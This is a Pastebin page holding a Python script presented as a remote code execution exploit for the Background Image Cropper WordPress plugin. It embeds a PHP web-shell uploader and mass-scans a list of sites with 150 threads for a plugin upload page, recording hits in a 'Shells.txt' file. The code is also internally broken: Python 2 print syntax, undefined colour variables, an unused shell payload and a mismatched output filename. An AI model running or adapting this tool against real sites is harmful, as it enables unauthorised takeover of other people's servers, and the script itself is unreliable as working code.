Advertisement
FlyFar

Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

Apr 22nd, 2024
517
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.56 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
  2. # Date: 2024-04-16
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Contact: miladgrayhat@gmail.com
  5. # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
  6. # Vendor Homepage: https://wordpress.org
  7. # Software Link: https://wordpress.org/plugins/background-image-cropper/
  8. # Version: 1.2
  9. # Category : webapps
  10. # Tested on: windows 10 , firefox
  11.  
  12. import sys , requests, re
  13. from multiprocessing.dummy import Pool
  14. from colorama import Fore
  15. from colorama import init
  16. init(autoreset=True)
  17. shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
  18. "<form method='post' enctype='multipart/form-data'> <input type='file'
  19. name='zb'><input type='submit' name='upload' value='upload'></form>";
  20. if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
  21. $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
  22. Upload."; } } ?>"""
  23. requests.urllib3.disable_warnings()
  24. headers = {'Connection': 'keep-alive',
  25.             'Cache-Control': 'max-age=0',
  26.             'Upgrade-Insecure-Requests': '1',
  27.             'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
  28. Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
  29. Chrome/60.0.3112.107 Moblie Safari/537.36',
  30.             'Accept':
  31. 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  32.             'Accept-Encoding': 'gzip, deflate',
  33.             'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
  34.             'referer': 'www.google.com'}
  35. try:
  36.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  37. except IndexError:
  38.     path = str(sys.argv[0]).split('\\')
  39.     exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
  40.  
  41. def URLdomain(site):
  42.     if site.startswith("http://") :
  43.         site = site.replace("http://","")
  44.     elif site.startswith("https://") :
  45.         site = site.replace("https://","")
  46.     else :
  47.         pass
  48.     pattern = re.compile('(.*)/')
  49.     while re.findall(pattern,site):
  50.         sitez = re.findall(pattern,site)
  51.         site = sitez[0]
  52.     return site
  53.  
  54.  
  55. def FourHundredThree(url):
  56.     try:
  57.         url = 'http://' + URLdomain(url)
  58.         check =
  59. requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
  60. allow_redirects=True,timeout=15)
  61.         if 'enctype="multipart/form-data" name="uploader"
  62. id="uploader"><input type="file" name="file" size="50"><input name="_upl"
  63. type="submit" id="_upl" value="Upload' in check.content:
  64.                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  65.                 open('Shells.txt', 'a').write(url +
  66. '/wp-content/plugins/background-image-cropper/ups.php\n')
  67.         else:
  68.             url = 'https://' + URLdomain(url)
  69.             check =
  70. requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
  71. allow_redirects=True,verify=False ,timeout=15)
  72.             if 'enctype="multipart/form-data" name="uploader"
  73. id="uploader"><input type="file" name="file" size="50"><input name="_upl"
  74. type="submit" id="_upl" value="Upload' in check.content:
  75.                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  76.                     open('Shells.txt', 'a').write(url +
  77. '/wp-content/plugins/background-image-cropper/ups.php\n')
  78.             else:
  79.                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  80.     except :
  81.         print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  82.  
  83. mp = Pool(150)
  84. mp.map(FourHundredThree, target)
  85. mp.close()
  86. mp.join()
  87.  
  88. print '\n [!] {}Saved in LOL.txt'.format(fc)
  89.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement